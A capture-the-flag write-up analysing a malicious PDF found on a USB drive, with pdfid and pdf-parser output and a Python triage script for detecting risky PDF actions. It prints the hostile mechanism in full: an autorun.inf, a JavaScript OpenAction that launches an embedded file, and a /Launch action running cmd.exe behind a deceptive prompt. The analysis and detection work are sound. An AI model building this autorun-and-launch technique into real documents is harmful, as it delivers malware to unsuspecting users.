4ensiX

BTLO Challenge Suspicious USB Stick (Retired Challenge) write-up

Scenario

One of our clients informed us they recently suffered an employee data breach. As a startup company, they had a constrained budget allocated for security and employee training. I visited them and spoke with the relevant stakeholders. I also collected some suspicious emails and a USB drive an employee found on their premises. While I am analyzing the suspicious emails, can you check the contents on the USB drive?

Reading Material:
https://zeltser.com/analyzing-malicious-documents/
https://en.wikipedia.org/wiki/List_of_file_signatures
https://eternal-todo.com/tools/peepdf-pdf-analysis-tool.

Challenge Submission

1. What file is the autorun.inf running? (3 points)

Format: filename.extension

$ cat autorun.inf 
[autorun]
open=README.pdf
icon=autorun.ico

Answer: README.pdf

2. Does the pdf file pass virustotal scan? (No malicious results returned) (2 points)

True or False

SHA256: c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43
https://www.virustotal.com/gui/file/c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43

VirusTotal detections: 38/59

Answer: False

3. Does the file have the correct magic number? (2 points)

True or False

$ file README.pdf 
README.pdf: PDF document, version 1.7
$ hexdump -C README.pdf | head
00000000  25 50 44 46 2d 31 2e 37  0d 0a 25 b5 b5 b5 b5 0d  |%PDF-1.7..%.....|
00000010  0a 31 20 30 20 6f 62 6a  0d 0a 3c 3c 2f 54 79 70  |.1 0 obj..<</Typ|
00000020  65 2f 43 61 74 61 6c 6f  67 2f 50 61 67 65 73 20  |e/Catalog/Pages |
00000030  32 20 30 20 52 2f 4c 61  6e 67 28 65 6e 2d 55 53  |2 0 R/Lang(en-US|
00000040  29 20 2f 53 74 72 75 63  74 54 72 65 65 52 6f 6f  |) /StructTreeRoo|
00000050  74 20 31 30 20 30 20 52  2f 4d 61 72 6b 49 6e 66  |t 10 0 R/MarkInf|
00000060  6f 3c 3c 2f 4d 61 72 6b  65 64 20 74 72 75 65 3e  |o<</Marked true>|
00000070  3e 2f 4d 65 74 61 64 61  74 61 20 32 30 20 30 20  |>/Metadata 20 0 |
00000080  52 2f 56 69 65 77 65 72  50 72 65 66 65 72 65 6e  |R/ViewerPreferen|
00000090  63 65 73 20 32 31 20 30  20 52 3e 3e 0d 0a 65 6e  |ces 21 0 R>>..en|

Answer: True

4. What OS type can the file exploit? (Linux, MacOS, Windows, etc) (5 points)

Operating System

$ pdfinfo  README.pdf 
Creator:        StarMan
CreationDate:   Thu Feb 11 02:54:49 2021 EST
ModDate:        Thu Feb 11 02:54:49 2021 EST
Tagged:         yes
UserProperties: no
Suspects:       no
Form:           none
Syntax Warning: Bad launch-type link action
JavaScript:     no
Pages:          1
Encrypted:      no
Page size:      612 x 792 pts (letter)
Page rot:       0
File size:      136561 bytes
Optimized:      no
PDF version:    1.7
$ pdfid  README.pdf 
PDFiD 0.2.7 README.pdf
 PDF Header: %PDF-1.7
 obj                   25
 endobj                25
 stream                 7
 endstream              7
 xref                   4
 trailer                4
 startxref              4
 /Page                  2
 /Encrypt               0
 /ObjStm                1
 /JS                    1
 /JavaScript            1
 /AA                    1
 /OpenAction            1
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                1
 /EmbeddedFile          0
 /XFA                   0
 /Colors > 2^24         0
$ pdf-parser -a README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
Comment: 8
XREF: 4
Trailer: 4
StartXref: 4
Indirect object: 24
  8: 4, 9, 18, 19, 21, 24, 26, 9
 /Action 2: 27, 28
 /Catalog 2: 1, 1
 /ExtGState 2: 7, 8
 /Filespec 1: 25
 /Font 1: 5
 /FontDescriptor 1: 6
 /Metadata 2: 20, 20
 /ObjStm 1: 17
 /Page 2: 3, 3
 /Pages 1: 2
 /XRef 1: 22
Search keywords:
 /JS 1: 27
 /JavaScript 1: 27
 /AA 1: 3
 /OpenAction 1: 1
 /Launch 1: 28
# Check the /JS, /JavaScript, /OpenAction and /Launch hits
$ pdf-parser -o 27 README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 27 0
 Type: /Action
 Referencing: 

  <<
    /S /JavaScript
    /JS (this.exportDataObject({ cName: "README", nLaunch: 0 });)
    /Type /Action
  >>
$ pdf-parser -o 1 README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 1 0
 Type: /Catalog
 Referencing: 2 0 R, 10 0 R, 20 0 R, 21 0 R

  <<
    /Type /Catalog
    /Pages 2 0 R
    /Lang (en-US)
    /StructTreeRoot 10 0 R
    /MarkInfo
      <<
        /Marked true
      >>
    /Metadata 20 0 R
    /ViewerPreferences 21 0 R
  >>


obj 1 0
 Type: /Catalog
 Referencing: 2 0 R, 23 0 R, 27 0 R, 10 0 R, 20 0 R, 21 0 R

  <<
    /Type /Catalog
    /Pages 2 0 R
    /Names 23 0 R
    /OpenAction 27 0 R
    /Lang (en-US)
    /StructTreeRoot 10 0 R
    /MarkInfo
      <<
        /Marked true
      >>
    /Metadata 20 0 R
    /ViewerPreferences 21 0 R
  >>
$ pdf-parser -o 28 README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 28 0
 Type: /Action
 Referencing: 

  <<
    /S /Launch
    /Type /Action
    /Win
      <<
        /F (cmd.exe)
        /D '(c:\\\\windows\\\\system32)'
        /P '(/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\\\README.pdf" (cd "Desktop"))&(if exist "My Documents\\\\README.pdf" (cd "My Documents"))&(if exist "Documents\\\\README.pdf" (cd "Documents"))&(if exist "Escritorio\\\\README.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\\\\README.pdf" (cd "Mis Documentos"))&(start README.pdf)\n\n\n\n\n\n\n\n\n\nTo view the encrypted content please tick the "Do not show this message again" box and press Open.)'
      >>
  >>

Answer: windows

5. A Windows executable is mentioned in the pdf file, what is it? (3 points)

Format: filename.exe

From the output of pdf-parser -o 28 README.pdf above (the /Launch action's /Win /F entry):

Answer: cmd.exe

6. How many suspicious /OpenAction elements does the file have? (5 points)

From the pdfid README.pdf output, and from obj 1, whose /OpenAction points to obj 27 and so runs the suspicious JavaScript, there is one.

Answer: 1
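As an added example (not part of the write-up or the challenge files), the triage steps above can be scripted: the %PDF- magic check from question 3, pdfid-style counts of the risky name tokens (also catching #xx hex-escaped names such as /J#53), and following the Catalog's /OpenAction to the JavaScript action and the /Launch executable from questions 4 to 6. SAMPLE_PDF is a constructed fragment modelled on the objects shown in the write-up, not the real README.pdf.

```python
import re

# Constructed sample modelled on the write-up's findings: a Catalog whose
# /OpenAction points at a JavaScript action (obj 27) and a /Launch action
# (obj 28) that starts cmd.exe. It is NOT the challenge's README.pdf.
SAMPLE_PDF = (
    b"%PDF-1.7\r\n"
    b"1 0 obj\r\n<</Type/Catalog/Pages 2 0 R/Names 23 0 R/OpenAction 27 0 R>>\r\nendobj\r\n"
    b"27 0 obj\r\n<</S/JavaScript/JS (this.exportDataObject({ cName: \"README\", nLaunch: 0 });)"
    b"/Type/Action>>\r\nendobj\r\n"
    b"28 0 obj\r\n<</S/Launch/Type/Action/Win<</F (cmd.exe)/D (c:\\\\windows\\\\system32)"
    b"/P (/Q /C start README.pdf)>>>>\r\nendobj\r\n"
    b"trailer\r\n<</Root 1 0 R>>\r\n%%EOF\r\n"
)

# The pdfid-style name tokens the write-up triaged.
RISKY = [b"/JS", b"/JavaScript", b"/AA", b"/OpenAction", b"/Launch", b"/EmbeddedFile"]

def has_pdf_magic(data: bytes) -> bool:
    """Question 3: the file signature is the literal %PDF- at offset 0."""
    return data.startswith(b"%PDF-")

def count_keywords(data: bytes) -> dict:
    """Count each risky name token, after undoing #xx hex escapes in names
    (/J#53 -> /JS) so obfuscated keywords still count, as pdfid does."""
    data = re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)
    # The lookahead keeps /JS from matching a longer name such as /JSxyz.
    return {kw.decode(): len(re.findall(re.escape(kw) + rb"(?![A-Za-z0-9])", data))
            for kw in RISKY}

def get_object(data: bytes, num: int) -> bytes:
    """Return the body of indirect object `num 0 obj`, or b"" if absent."""
    m = re.search(rb"(?<![0-9])%d 0 obj\s*(.*?)\s*endobj" % num, data, re.S)
    return m.group(1) if m else b""

def open_action_chain(data: bytes) -> dict:
    """Questions 4-6: follow the Catalog's /OpenAction reference and report
    the action subtype, any /JS code, and every /Launch /F executable."""
    ref = re.search(rb"/OpenAction\s+(\d+)\s+\d+\s+R", data)
    target = get_object(data, int(ref.group(1))) if ref else b""
    sub = re.search(rb"/S\s*/([A-Za-z]+)", target)
    js = re.search(rb"/JS\s*\((.*?)\)\s*(?:/|>>)", target, re.S)
    launch = re.findall(rb"/S\s*/Launch.*?/F\s*\(([^)]*)\)", data, re.S)
    return {"open_action_obj": int(ref.group(1)) if ref else None,
            "subtype": sub.group(1).decode() if sub else None,
            "js": js.group(1).decode() if js else None,
            "launch_executables": [f.decode() for f in launch]}
```

The regexes are a byte-level heuristic like pdfid's, so a sample with compressed object streams (/ObjStm, which the challenge file also has) needs the streams inflated first or a real parser such as pdf-parser.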